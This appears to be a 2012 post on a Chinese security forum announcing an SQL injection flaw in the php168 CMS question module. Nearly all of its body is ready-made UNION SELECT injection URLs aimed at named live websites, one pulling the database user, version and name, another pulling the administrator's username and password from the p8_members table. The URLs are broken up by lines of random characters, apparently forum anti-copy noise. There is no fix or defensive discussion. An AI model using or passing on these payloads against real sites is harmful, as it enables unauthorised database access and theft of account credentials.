找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2976|回复: 0
打印 上一主题 下一主题

php168某系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 08:52:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://v7.php168.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--! ~7 J; u8 i, H
                                                         
5 ?  m" v9 q0 u$ ^. D# X                                       
0 \2 g- u, y2 ^5 V( ^0 e# }. e
* a! A, p' V6 ?: Y
http://www.china-highway.com/zhidao/user.php?%00&j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--; `7 i: K# _, L/ _& n
                                                     
: D' C3 O: D5 D* S8 U+ t- i- [+ j                                                                  
9 N" C) P% |3 x: s( k% b                                                        
1 E7 Y# @  _9 f) Whttp://v7.php168.com/zhidao/user ... u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--, L0 D5 n; M* _/ P. q# A9 h# Q
9 b/ j! z! N2 p) ~

1 n) k4 \! E2 E0 F4 m
# b+ `3 j( N) D/ n( O                                                            
  E. i0 h& Z# i4 G/ L+ i 8 ]  n2 ~( y5 F% q
http://www.china-highway.com/zhi ... u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--$ J( }; d2 p) \8 M! g* g2 j
6 v+ o/ _: F% O0 u

( e( o2 w& R. g8 |$ F# S  p6 q& v: d: U: I' r$ ]; n0 ]8 r, e+ g
                                                                    
! W" F! e4 P* u5 B

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表